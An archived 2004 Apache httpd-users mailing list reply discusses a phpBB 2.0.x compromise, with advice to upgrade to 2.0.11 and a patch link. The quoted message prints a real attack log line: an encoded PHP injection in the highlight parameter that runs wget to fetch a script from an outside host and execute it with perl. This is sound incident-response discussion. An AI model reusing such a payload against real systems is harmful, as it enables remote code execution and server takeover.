httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Shannon Eric Peevey <spee...@unt.edu>
Subject Re: [users@httpd] Security issue with 2.0.50
Date Sat, 04 Dec 2004 17:02:08 GMT
Arthur Kerpician wrote:

>>
> I got to the bottom of it and this is what I had found:
> forum.protected.com-access_log:200.140.216.79 - - 
> [04/Dec/2004:06:55:54 +0200] "GET 
> /viewtopic.php?t=139&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(104)%252echr(111)%252echr(111)%252echr(98)%252echr(46)%252echr(119)%252echr(101)%252echr(98)%252echr(99)%252echr(105)%252echr(110)%252echr(100)%252echr(97)%252echr(114)%252echr(105)%252echr(111)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(48)%252echr(115)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527

> HTTP/1.0" 200 13994
>
> It seems that the gateway for my server's vulnerability was 
> phpBB-2.0.4. If convert the ascii in the url to chars it will give you 
> this:
> echo uncomeco;cd /var/tmp;wget http://hoob.webcindario.com/bla..bla...
> Eric, you were right by giving me the example with pollvote...that 
> made me look into all sites' logs hosted on that server. The forum was 
> the only site which recorded this kind of requests (I did a `grep 
> /www/logs/*access_log* echr` on all access logs). There were several 
> records like the one above with IP's coming from Brazil, Dominican 
> Republic, Spain, Germany, AOL...I guess untraceable proxys.
>
> I upgraded today to phpBB-2.0.11, the latest stable release tagged by 
> the authors as "critical update". Thanks all for your fast replies, 
> I'll keep posting on the subject if the matter isn't solved.
>
Arthur,

Great!!  Yeah, there are all kinds of SQL injection issues in 
phpBB-2.0.10, so its good you have 2.0.11 installed now.  I know this is 
an Apache list, but should follow this up with the location of the patch 
for anyone that is not able to upgrade to phpBB-2.0.11 yet:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513

Ivan, if you see how phpBB2 is dealing with safe_mode=On, they have you 
create a tmp dir under the bulletin board root chmod'd to 777...  You're 
guess is as good as mine as to the actual security of this fix.  It 
seems to me that safe_mode is still largely ignored by many PHP 
application developers, (photo galleries in particular), so it might not 
be feasible to run your application in safe_mode.  I didn't explore the 
exact vulnerability in pollvote.php, but I assume it must be a weakness 
form validation. 

see ya'll,

-- 
Shannon Eric Peevey                     =>  "speeves"
Dyno-Mite! System Administrator         =>  speeves@unt.edu
Central Web Support                     =>  (940) 369-8876
University of North Texas               =>  http://web2.unt.edu



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message